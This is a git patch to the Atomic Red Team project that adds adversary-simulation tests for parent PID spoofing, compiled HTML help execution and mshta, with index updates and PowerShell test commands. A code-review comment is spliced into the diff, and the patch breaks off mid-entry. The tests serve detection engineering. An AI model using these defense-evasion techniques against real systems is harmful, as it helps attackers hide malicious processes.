From c8f43265c78d826080f62d8a8dfc4d6874f563e8 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Thu, 22 Oct 2020 14:34:31 -0600 Subject: [PATCH] Introducing AtomicTestHarnesses Tests to ART (#1270) * Introduce AtomicTestHarness Tests to ART Adding: - T1134.004 - Access Token Manipulation: Parent PID Spoofing - T1218.001 - Signed Binary Proxy Execution: Compiled HTML File - T1218.005 - Signed Binary Proxy Execution: Mshta These tests utilize the recently released [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses) to simulate the base tests from from each ATH Harness. Input arguments may be manipulated as needed to enhance simulation. * Generate docs from job=validate_atomics_generate_docs branch=atomictestharness-tests Co-authored-by: CircleCI Atomic Red Team doc generator --- atomics/Indexes/Indexes-CSV/index.csv | 19 + atomics/Indexes/Indexes-CSV/windows-index.csv | 19 + atomics/Indexes/Indexes-Markdown/index.md | 19 + .../Indexes/Indexes-Markdown/windows-index.md | 19 + atomics/Indexes/index.yaml | 614 ++++++++++++++++++ atomics/T1134.004/T1134.004.md | 186 ++++++ atomics/T1134.004/T1134.004.yaml | 111 ++++ atomics/T1218.001/T1218.001.md | 235 +++++++ atomics/T1218.001/T1218.001.yaml | 149 +++++ atomics/T1218.005/T1218.005.md | 278 ++++++++ atomics/T1218.005/T1218.005.yaml | 164 +++++ atomics/used_guids.txt | 15 + 12 files changed, 1828 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index df30d489..ac1ca6d0 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -38,6 +38,10 @@ privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
 privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
@@ -245,6 +249,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
 defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
 defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -339,6 +348,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -355,6 +370,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 03989321..d7f2c379 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -25,6 +25,10 @@ privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Glo
 privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
@@ -74,6 +78,11 @@ defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using
 defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
 defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
 defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
+defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
+defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
+defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
+defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
+defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
 defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
@@ -132,6 +141,12 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
+defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
+defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
+defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
+defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
+defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
+defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -147,6 +162,10 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
+defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
 defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index c3805661..fd0c9ef3 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -89,6 +89,10 @@ - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -499,6 +503,11 @@ - [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md) - Atomic Test #1: Compiled HTML Help Local Payload [windows] - Atomic Test #2: Compiled HTML Help Remote Payload [windows] + - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows] + - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows] + - Atomic Test #5: Invoke CHM Simulate Double click [windows] + - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows] + - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1218.002 Control Panel](../../T1218.002/T1218.002.md) - Atomic Test #1: Control Panel Items [windows] 
@@ -650,6 +659,12 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] + - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows] + - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows] + - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows] + - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] + - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] + - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -672,6 +687,10 @@ - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a067f6b0..8e5be8f7 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -62,6 +62,10 @@ - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -153,6 +157,11 @@ - [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md) - Atomic Test #1: Compiled HTML Help Local Payload [windows] - Atomic Test #2: Compiled HTML Help Remote Payload [windows] + - Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows] + - Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows] + - Atomic Test #5: Invoke CHM Simulate Double click [windows] + - Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows] + - Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1218.002 Control Panel](../../T1218.002/T1218.002.md) - Atomic Test #1: Control Panel Items [windows] 
@@ -255,6 +264,12 @@ - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] + - Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows] + - Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows] + - Atomic Test #6: Invoke HTML Application - Direct download from URI [windows] + - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] + - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] + - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -276,6 +291,10 @@ - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8ab000e2..aadbbec2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -4496,6 +4496,134 @@ privilege-escalation: Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore name: powershell + - name: Parent PID Spoofing - Spawn from Current Process + auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 + description: Spawns a powershell.exe process as a child of the current process. + supported_platforms: + - windows + input_arguments: + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine + ''#{command_line}'' -ParentId #{parent_pid}' + name: powershell + - name: Parent PID Spoofing - Spawn from Specified Process + auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb + description: Spawns a notepad.exe process as a child of the current process. 
+ supported_platforms: + - windows + input_arguments: + parent_pid: + description: PID of process to spawn from + type: string + default: "$PID" + test_guid: + description: Defined test GUID + type: string + default: 12345678-1234-1234-1234-123456789123 + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid + #{test_guid}' + name: powershell + - name: Parent PID Spoofing - Spawn from svchost.exe + auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 + description: Spawnd a process as a child of the first accessible svchost.exe + process. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, + ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | + Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} + -CommandLine ''#{command_line}''' + name: powershell + - name: Parent PID Spoofing - Spawn from New Process + auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db + description: Creates a notepad.exe process and then spawns a powershell.exe + process as a child of it. + supported_platforms: + - windows + input_arguments: + command_line: + description: Specified command line to use + type: string + default: "-Command Start-Sleep 10" + file_path: + description: File path or name of process to spawn + type: path + default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + parent_name: + description: Parent process to spoof from + type: path + default: "$Env:windir\\System32\\notepad.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent + must be exported in the module. 
+ prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent + -FilePath #{file_path} -CommandLine ''#{command_line}''' + name: powershell T1034: technique: id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 
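Review bot: Every `get_prereq_command` in this hunk pulls AtomicTestHarnesses from the PowerShell Gallery unpinned (`Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force`) and the matching `prereq_command` only checks that the module exists, so what a test executes depends on whichever module version the Gallery serves on the day it runs and a tampered or breaking release would be picked up silently; pinning with `Install-Module -Name AtomicTestHarnesses -RequiredVersion <pinned-version> -Scope CurrentUser -Force` and comparing `$RequiredModule.Version` against the same value in the prereq check would make the simulation reproducible. The same install line recurs in the T1218.001 and T1218.005 hunks of this file, and since index.yaml is generated the fix belongs in the per-technique yaml files named in the diffstat (atomics/T1134.004/T1134.004.yaml and siblings). Two descriptions also need correcting at the source: `Spawnd a process` → `Spawns a process`, and the "Spawn from Specified Process" entry describes notepad.exe "as a child of the current process", which duplicates test #2's description while its executor is `Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}`. Separately, `Get-Module -ListAvailable` can return more than one object when several versions are installed, in which case `$RequiredModule.ExportedCommands[...]` may not evaluate as intended — worth confirming.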
@@ -22968,6 +23096,174 @@ defense-evasion: ' name: command_prompt + - name: Invoke CHM with default Shortcut Command Execution + auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 + description: Executes a CHM file with the default Shortcut Command method. + supported_platforms: + - windows + input_arguments: + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath + #{chm_file_path}' + name: powershell + - name: Invoke CHM with InfoTech Storage Protocol Handler + auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + description: Executes a CHM file with the ITS protocol handler. + supported_platforms: + - windows + input_arguments: + hh_file_path: + description: path of modified HH.exe + type: path + default: "$env:windir\\hh.exe" + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed 